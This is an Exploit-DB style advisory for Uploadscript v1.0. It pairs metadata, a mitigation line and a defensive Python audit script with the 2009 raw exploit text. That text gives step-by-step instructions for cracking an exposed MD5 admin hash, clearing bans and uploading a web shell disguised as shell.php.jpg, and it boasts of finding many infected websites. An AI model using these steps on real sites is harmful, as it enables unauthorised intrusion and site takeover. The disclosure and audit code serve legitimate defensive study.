Vendor: Uploadscript v1.0.
By: Mr.aFiR
CVSS: 7.5 (HIGH)
Type: Admin-password / Shell Upload
CWE: N/A
Product Name: Uploadscript v1.0.
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: GNU/LINUX
2009

Uploadscript v1.0. Multiple Vulnerabilities

This exploit allows an attacker to gain access to the admin panel of the Uploadscript v1.0. application by cracking the MD5 password hash found in the password.txt file (MD5 is a hash, so "decrypting" it means recovering the plaintext). Once the attacker has access to the admin panel, they can upload a malicious shell to the upload directory and execute it.

Mitigation:

Ensure that the password.txt file is not accessible to the public and that the admin panel is protected with a strong password.
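
A deployment check for the two weaknesses described here, as an added example that is not part of the original advisory or of Uploadscript itself. The file name password.txt and the storagedata/ directory come from the advisory; the function names, the script-extension list and the sample tree are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Extensions a PHP-enabled server may pass to the interpreter (assumed list).
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar"}
MD5_HEX = re.compile(r"^[0-9a-fA-F]{32}$")

def risky_upload_name(name):
    """True if ANY extension segment is a script extension (shell.php.jpg).

    Apache's mod_mime can map every extension segment to a handler, so
    checking only the final extension is not sufficient.
    """
    parts = name.lower().split(".")[1:]
    return any(p in SCRIPT_EXTS for p in parts)

def audit(webroot):
    """Return findings for a credential file and script-named uploads."""
    root = Path(webroot)
    findings = []
    pw = root / "password.txt"
    if pw.is_file():
        text = pw.read_text(errors="replace").strip()
        kind = "MD5-shaped hash" if MD5_HEX.match(text) else "credential file"
        findings.append(f"password.txt: {kind} stored inside the web root")
    store = root / "storagedata"
    if store.is_dir():
        for f in sorted(store.iterdir()):
            if f.is_file() and risky_upload_name(f.name):
                findings.append(f"storagedata/{f.name}: script extension in upload name")
    return findings

def demo():
    """Build a constructed install tree in a temp directory and audit it."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "password.txt").write_text("0" * 32 + "\n")  # constructed placeholder
        (root / "storagedata").mkdir()
        for n in ("holiday.jpg", "shell.php.jpg", "notes.PHTML"):
            (root / "storagedata" / n).write_bytes(b"")
        return audit(root)

if __name__ == "__main__":
    for line in demo():
        print(line)
```

Any finding from `audit()` on a live install means the credential file should be moved out of the web root and script execution disabled for the upload directory.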

Exploit-DB raw data:

# Exploit Title: Uploadscript v1.0. Multiple Vulnerabilities
# Date: 13-12-2009
# Author: Mr.aFiR
# Software Link: http://www.phpstudio.hu/?action=verify&categorize=php&subaction=php&context=php&ID=75&verify=0
# Version: N/A
# Tested on: GNU/LINUX
# CVE : N/A
# Code : N/A
#####################################################################

#####################################################################
##                                _______   ____                   ##
##          __ ___               / _____ \ /  __ \                 ##
##         /      \  _ _     ___ | |___ |/ | |  ) )                ##
##        |  Y  Y  \| V_\   / _ Y|  __ |(_)| |_/ /      [A]        ##
##        |__|__|__ \ |  ()| (_] | |  \|| ||  __ \                 ##
##                 \/_/     \___ | |    | || |  ) |                ##
##                              \|/     |_/|_/  |/                 ##
##                                                                 ##
#####################################################################
##          Uploadscript v1.0. Multiple Vulnerabilities            ##
##                [Admin-password / Shell Upload]                  ##
##              Created By Mr.aFiR (Moroccan Hacker)               ##
##            Email: q-_@hotmail.com / ax@hotmail.com              ##
##                     Website: www.aFiR.me                        ##
##                      (c) -- 13/12/2oo9                          ##
#####################################################################
##                      * How to use it ?                          ##
##                      -----------------                          ##
## ~ Go to : > http://site/path/password.txt                       ##
##           > You will find a Hash(md5) password !                ##
##           > Decrypt this password !                             ##
##           > Now! Go to : /path/admin.php                        ##
##           > Write the password & Login to AdminCP               ##
##           > Go to : /path/admin.php?act=bans                    ##
##           > Delete All Bans                                     ##
##           > Now! Go to : /path/index.php                        ##
##           > Upload your shell as : shell.php.jpg                ##
##           > Uploaded Files Directory is : /path/storagedata/    ##
##           > Your Link is:                                       ##
##                     http://server/path/storagedata/[Shell]      ##
##           > -------------------------------------------------   ##
##           > Enjoy With it, You Will Find a lot of infected      ##
##             websites. & Remember me ;)                          ##
#####################################################################
## ~ GreatZ To : > Dr.Crypter - Dr.BoB-Hacker - Love511 & All ...  ##
## ~ Contact   : > q-_[at]Hotmail[dot]com - www[dot]aFiR[dot]me    ##
##                        I Love You ****                          ##
#####################################################################